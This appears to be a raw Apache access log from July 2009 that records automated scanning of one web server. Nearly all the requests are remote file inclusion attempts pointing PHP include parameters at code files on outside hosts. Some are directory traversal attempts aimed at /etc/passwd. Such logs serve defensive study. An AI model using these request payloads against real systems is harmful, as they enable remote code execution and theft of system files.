216.117.172.131 - - [18/Jul/2009:03:04:44 -0400] "GET /logs/error_log.Q109071400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:04:55 -0400] "GET /logs/error_log.Q109071400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:04:56 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:04:57 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:04:57 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:04:58 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:04:58 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
206.225.23.4 - - [18/Jul/2009:03:04:59 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:04:59 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
206.225.23.4 - - [18/Jul/2009:03:04:59 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 9994 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:04:59 -0400] "GET /logs/access_log.Q109061900%20%20/?_SERVER[DOCUMENT_ROOT]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:04:59 -0400] "GET /logs/access_log.Q109061200%20%20/?_SERVER[DOCUMENT_ROOT]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:05:05 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
70.86.9.234 - - [18/Jul/2009:03:05:10 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:03:05:11 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
206.225.23.4 - - [18/Jul/2009:03:05:59 -0400] "GET //admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:05:59 -0400] "GET /logs//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:05:59 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:05 -0400] "GET //admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:05 -0400] "GET /logs//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:05 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:06:05 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:06:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:06:06 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:06 -0400] "GET //admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:06 -0400] "GET /logs//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:07 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:15 -0400] "GET //admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:15 -0400] "GET /logs//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:15 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:18 -0400] "GET /logs/access_log.Q109052100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:19 -0400] "GET /logs/access_log.Q109052100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:06:19 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:20 -0400] "GET /logs//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:20 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:21 -0400] "GET //admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:06:24 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:24 -0400] "GET /logs/access_log.Q109052100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:29 -0400] "GET /logs/access_log.Q109052100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:31 -0400] "GET //admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:06:31 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:31 -0400] "GET /logs/access_log.Q109053100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:31 -0400] "GET /logs//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:06:33 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:41 -0400] "GET /logs/access_log.Q109052100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:06:46 -0400] "GET /logs/access_log.Q109052100%20%20//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:07:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.51.115 - - [18/Jul/2009:03:07:33 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
114.200.199.144 - - [18/Jul/2009:03:07:52 -0400] "GET /logs/send_reminders.php?includedir=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:07:52 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:07:52 -0400] "GET /send_reminders.php?includedir=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:08:33 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:08:33 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:08:33 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:03:08:33 -0400] "GET /logs/access_log.Q109051200//frame.php?framefile=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:03:08:37 -0400] "GET /logs/access_log.Q109052500//frame.php?framefile=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:08:41 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:08:52 -0400] "GET /logs/access_log.Q109070300%20%20/send_reminders.php?includedir=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:08:59 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:08:59 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:08:59 -0400] "GET /logs/access_log.Q109071100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:03:09:03 -0400] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:03:09:03 -0400] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:03:09:03 -0400] "GET /logs/access_log.Q109060600/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
118.129.166.129 - - [18/Jul/2009:03:09:16 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:03:09:16 -0400] "GET /logs/access_log.Q109060400//modules/mod_weather.php?absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:03:09:17 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:09:21 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:09:22 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:09:57 -0400] "GET /logs/error_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:10:11 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:10:11 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:10:11 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
115.92.96.43 - - [18/Jul/2009:03:10:16 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
218.237.66.229 - - [18/Jul/2009:03:10:31 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:03:10:37 -0400] "GET /logs/access_log.Q109070300/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
114.32.40.221 - - [18/Jul/2009:03:10:39 -0400] "GET /logs/error_log.Q109071400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:10:40 -0400] "GET /logs/error_log.Q109071400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:03:11:06 -0400] "GET /logs/access_log.Q109050800%20%20/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:03:11:06 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:03:11:06 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 9994 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:11:37 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
206.225.23.4 - - [18/Jul/2009:03:11:42 -0400] "GET /logs/access_log.Q109053100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:43 -0400] "GET /logs/access_log.Q109052100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:43 -0400] "GET /logs/access_log.Q109053100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:44 -0400] "GET /logs/access_log.Q109052100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:50 -0400] "GET /logs/access_log.Q109052100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:50 -0400] "GET /logs/access_log.Q109053100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:50 -0400] "GET /logs/access_log.Q109053100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:11:55 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:11:55 -0400] "GET /logs/access_log.Q109052100//admin.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:12:04 -0400] "GET /logs/access_log.Q109063000%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.811"
209.59.12.99 - - [18/Jul/2009:03:12:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.237.66.229 - - [18/Jul/2009:03:12:13 -0400] "GET /logs/error_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:12:21 -0400] "GET /logs/access_log.Q109071100%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:03:12:24 -0400] "GET /logs/access_log.Q109063000%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 288 "-" "libwww-perl/5.811"
114.200.199.144 - - [18/Jul/2009:03:12:39 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:03:12:40 -0400] "GET /logs/access_log.Q109060800%20%20/?_SERVER[DOCUMENT_ROOT]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:12:44 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:12:59 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:13:00 -0400] "GET /logs/error_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:03:13:14 -0400] "GET /logs/access_log.Q109070300/send_reminders.php?includedir=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:03:13:17 -0400] "GET /logs/access_log.Q109060400%20%20//modules/mod_weather.php?absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:03:14:02 -0400] "GET /logs/error_log.Q109060400%20%20//modules/mod_weather.php?absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:06 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:07 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:07 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:07 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:07 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:07 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:24 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:14:25 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:14:59 -0400] "GET /logs/access_log.Q109070500//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:15:00 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:15:00 -0400] "GET /logs//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 9999 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:15:57 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
65.23.158.226 - - [18/Jul/2009:03:16:12 -0400] "GET /logs//include/footer.php?_path[counter]=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:03:16:13 -0400] "GET //include/footer.php?_path[counter]=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:03:16:13 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.110.97.12 - - [18/Jul/2009:03:16:25 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
190.144.44.36 - - [18/Jul/2009:03:16:50 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:03:16:50 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:03:16:50 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:03:17:04 -0400] "GET /logs/error_log.Q109060400//modules/mod_weather.php?absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:17:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
